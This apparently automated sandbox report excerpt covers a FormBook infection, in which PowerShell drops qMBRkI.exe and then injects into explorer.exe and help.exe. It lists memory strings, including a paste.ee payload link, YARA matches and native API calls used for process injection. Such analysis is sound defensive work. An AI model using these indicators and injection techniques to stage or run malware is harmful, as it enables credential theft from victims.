              Source: powershell.exe, 00000002.00000002.376574535.000000000542F000.00000004.00000001.sdmpString found in binary or memory: https://fonts.gstatic.com;
              Source: powershell.exe, 00000002.00000002.376291085.0000000005300000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000002.00000002.376291085.0000000005300000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/PesterD
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
              Source: powershell.exe, 00000002.00000002.378238304.00000000055E5000.00000004.00000001.sdmpString found in binary or memory: https://go.micro
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://graph.ppe.windows.net
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://graph.ppe.windows.net/
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://graph.windows.net
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://graph.windows.net/
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&amp;premium=1
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&amp;premium=1
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&amp;premium=1
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://incidents.diagnostics.office.com
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://lifecycle.office.com
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://login.microsoftonline.com/
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://login.windows.local
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://management.azure.com
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://management.azure.com/
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://messaging.office.com/
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://ncus.contentsync.
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://ncus.pagecontentsync.
              Source: powershell.exe, 00000002.00000002.379786049.0000000006221000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://officeapps.live.com
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://onedrive.live.com
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://onedrive.live.com/embed?
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
              Source: powershell.exe, 00000002.00000002.376441582.00000000053FF000.00000004.00000001.sdmpString found in binary or memory: https://paste.ee/r/r87uc
              Source: powershell.exe, 00000002.00000002.376441582.00000000053FF000.00000004.00000001.sdmpString found in binary or memory: https://paste.ee4
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://powerlift.acompli.net
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
              Source: powershell.exe, 00000002.00000002.376574535.000000000542F000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
              Source: powershell.exe, 00000002.00000002.376574535.000000000542F000.00000004.00000001.sdmpString found in binary or memory: https://secure.gravatar.com
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://settings.outlook.com
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://shell.suite.office.com:1443
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://skyapi.live.net/Activity/
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://staging.cortana.ai
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://store.office.cn/addinstemplate
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://store.office.com/addinstemplate
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://store.office.de/addinstemplate
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://tasks.office.com
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://templatelogging.office.com/client/log
              Source: powershell.exe, 00000002.00000002.376574535.000000000542F000.00000004.00000001.sdmpString found in binary or memory: https://themes.googleusercontent.com
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://web.microsoftstream.com/video/
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://webshell.suite.office.com
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://wus2.contentsync.
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://wus2.pagecontentsync.
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
              Source: powershell.exe, 00000002.00000002.376462177.0000000005416000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
              Source: powershell.exe, 00000002.00000002.376574535.000000000542F000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com
              Source: explorer.exe, 00000013.00000002.501779211.0000000005603000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/
              Source: explorer.exe, 00000013.00000000.385034620.00000000088C3000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
              Source: explorer.exe, 00000013.00000000.385128368.0000000008907000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
              Source: explorer.exe, 00000013.00000000.385128368.0000000008907000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=05o
              Source: powershell.exe, 00000002.00000002.376574535.000000000542F000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com;
              Source: powershell.exe, 00000002.00000002.376574535.000000000542F000.00000004.00000001.sdmpString found in binary or memory: https://www.gstatic.com
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://www.odwebp.svc.ms
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
              Source: C:\Windows\explorer.exeCode function: 19_2_063B3EB2 OpenClipboard,19_2_063B3EB2
              Source: qMBRkI.exe, 00000012.00000002.402761273.000000000088A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

              E-Banking Fraud:

              barindex
              Yara detected FormBookShow sources
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Source: Yara matchFile source: 00000012.00000000.351250789.0000000000E31000.00000020.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000015.00000002.483125240.0000000000530000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000015.00000002.484194333.000000000084D000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000015.00000002.485540781.0000000000AB0000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.402683254.0000000000850000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000015.00000002.485890684.0000000000AE0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.402620758.0000000000820000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.403260646.0000000000E31000.00000020.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000015.00000002.489324864.00000000035D7000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\qMBRkI.exe, type: DROPPED
              Source: Yara matchFile source: 18.0.qMBRkI.exe.e30000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.2.qMBRkI.exe.e30000.1.unpack, type: UNPACKEDPE

              System Summary:

              barindex
              Malicious sample detected (through community Yara rule)Show sources
              Source: dump.pcap, type: PCAPMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: dump.pcap, type: PCAPMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000012.00000000.351250789.0000000000E31000.00000020.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000012.00000000.351250789.0000000000E31000.00000020.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000015.00000002.483125240.0000000000530000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000015.00000002.483125240.0000000000530000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000015.00000002.484194333.000000000084D000.00000004.00000020.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000015.00000002.484194333.000000000084D000.00000004.00000020.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000015.00000002.485540781.0000000000AB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000015.00000002.485540781.0000000000AB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000012.00000002.402683254.0000000000850000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000012.00000002.402683254.0000000000850000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000015.00000002.485890684.0000000000AE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000015.00000002.485890684.0000000000AE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000012.00000002.402620758.0000000000820000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000012.00000002.402620758.0000000000820000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000012.00000002.403260646.0000000000E31000.00000020.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000012.00000002.403260646.0000000000E31000.00000020.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000015.00000002.489324864.00000000035D7000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000015.00000002.489324864.00000000035D7000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: C:\Users\user\AppData\Local\Temp\qMBRkI.exe, type: DROPPEDMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: C:\Users\user\AppData\Local\Temp\qMBRkI.exe, type: DROPPEDMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 18.0.qMBRkI.exe.e30000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 18.0.qMBRkI.exe.e30000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 18.2.qMBRkI.exe.e30000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 18.2.qMBRkI.exe.e30000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Powershell drops PE fileShow sources
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\qMBRkI.exeJump to dropped file
              Very long command line foundShow sources
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 25316
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 25316Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\qMBRkI.exeCode function: 18_2_00E481D0 NtCreateFile,18_2_00E481D0
              Source: C:\Users\user\AppData\Local\Temp\qMBRkI.exeCode function: 18_2_00E48280 NtReadFile,18_2_00E48280
              Source: C:\Users\user\AppData\Local\Temp\qMBRkI.exeCode function: 18_2_00E483B0 NtAllocateVirtualMemory,18_2_00E483B0
              Source: C:\Users\user\AppData\Local\Temp\qMBRkI.exeCode function: 18_2_00E48300 NtClose,18_2_00E48300
              Source: C:\Users\user\AppData\Local\Temp\qMBRkI.exeCode function: 18_2_00E481CC NtCreateFile,18_2_00E481CC
              Source: C:\Users\user\AppData\Local\Temp\qMBRkI.exeCode function: 18_2_00E483AA NtAllocateVirtualMemory,18_2_00E483AA
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03109A50 NtCreateFile,LdrInitializeThunk,21_2_03109A50
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03109910 NtAdjustPrivilegesToken,LdrInitializeThunk,21_2_03109910
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_031099A0 NtCreateSection,LdrInitializeThunk,21_2_031099A0
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03109840 NtDelayExecution,LdrInitializeThunk,21_2_03109840
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03109860 NtQuerySystemInformation,LdrInitializeThunk,21_2_03109860
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03109710 NtQueryInformationToken,LdrInitializeThunk,21_2_03109710
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03109780 NtMapViewOfSection,LdrInitializeThunk,21_2_03109780
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03109FE0 NtCreateMutant,LdrInitializeThunk,21_2_03109FE0
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03109650 NtQueryValueKey,LdrInitializeThunk,21_2_03109650
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03109660 NtAllocateVirtualMemory,LdrInitializeThunk,21_2_03109660
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_031096D0 NtCreateKey,LdrInitializeThunk,21_2_031096D0
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_031096E0 NtFreeVirtualMemory,LdrInitializeThunk,21_2_031096E0
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03109540 NtReadFile,LdrInitializeThunk,21_2_03109540
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_031095D0 NtClose,LdrInitializeThunk,21_2_031095D0
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03109B00 NtSetValueKey,21_2_03109B00
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_0310A3B0 NtGetContextThread,21_2_0310A3B0
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03109A10 NtQuerySection,21_2_03109A10
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03109A00 NtProtectVirtualMemory,21_2_03109A00
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03109A20 NtResumeThread,21_2_03109A20
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03109A80 NtOpenDirectoryObject,21_2_03109A80
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03109950 NtQueueApcThread,21_2_03109950
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_031099D0 NtCreateProcessEx,21_2_031099D0
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03109820 NtEnumerateKey,21_2_03109820
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_0310B040 NtSuspendThread,21_2_0310B040
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_031098A0 NtWriteVirtualMemory,21_2_031098A0
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_031098F0 NtReadVirtualMemory,21_2_031098F0
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_0310A710 NtOpenProcessToken,21_2_0310A710
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03109730 NtQueryVirtualMemory,21_2_03109730
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_0310A770 NtOpenThread,21_2_0310A770
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03109770 NtSetInformationFile,21_2_03109770
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03109760 NtOpenProcess,21_2_03109760
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_031097A0 NtUnmapViewOfSection,21_2_031097A0
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03109610 NtEnumerateValueKey,21_2_03109610
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03109670 NtQueryInformationProcess,21_2_03109670
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_0310AD30 NtSetContextThread,21_2_0310AD30
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03109520 NtWaitForSingleObject,21_2_03109520
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03109560 NtWriteFile,21_2_03109560
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_031095F0 NtQueryInformationFile,21_2_031095F0
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_005481D0 NtCreateFile,21_2_005481D0
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_00548280 NtReadFile,21_2_00548280
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_00548300 NtClose,21_2_00548300
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_005483B0 NtAllocateVirtualMemory,21_2_005483B0
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_005481CC NtCreateFile,21_2_005481CC
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_005483AA NtAllocateVirtualMemory,21_2_005483AA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_07FA62488_2_07FA6248
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_07FA51388_2_07FA5138
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_07FA00408_2_07FA0040
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_07FA7C588_2_07FA7C58
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_07FA7C498_2_07FA7C49
              Source: C:\Users\user\AppData\Local\Temp\qMBRkI.exeCode function: 18_2_00E3103018_2_00E31030
              Source: C:\Users\user\AppData\Local\Temp\qMBRkI.exeCode function: 18_2_00E38C6B18_2_00E38C6B
              Source: C:\Users\user\AppData\Local\Temp\qMBRkI.exeCode function: 18_2_00E38C7018_2_00E38C70
              Source: C:\Users\user\AppData\Local\Temp\qMBRkI.exeCode function: 18_2_00E32D9018_2_00E32D90
              Source: C:\Users\user\AppData\Local\Temp\qMBRkI.exeCode function: 18_2_00E32FB018_2_00E32FB0
              Source: C:\Windows\explorer.exeCode function: 19_2_063B706219_2_063B7062
              Source: C:\Windows\explorer.exeCode function: 19_2_063B28F919_2_063B28F9
              Source: C:\Windows\explorer.exeCode function: 19_2_063B52FF19_2_063B52FF
              Source: C:\Windows\explorer.exeCode function: 19_2_063B290219_2_063B2902
              Source: C:\Windows\explorer.exeCode function: 19_2_063B530219_2_063B5302
              Source: C:\Windows\explorer.exeCode function: 19_2_063B336219_2_063B3362
              Source: C:\Windows\explorer.exeCode function: 19_2_063B95B219_2_063B95B2
              Source: C:\Windows\explorer.exeCode function: 19_2_063B87C719_2_063B87C7
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030EA30921_2_030EA309
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03192B2821_2_03192B28
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030EAB4021_2_030EAB40
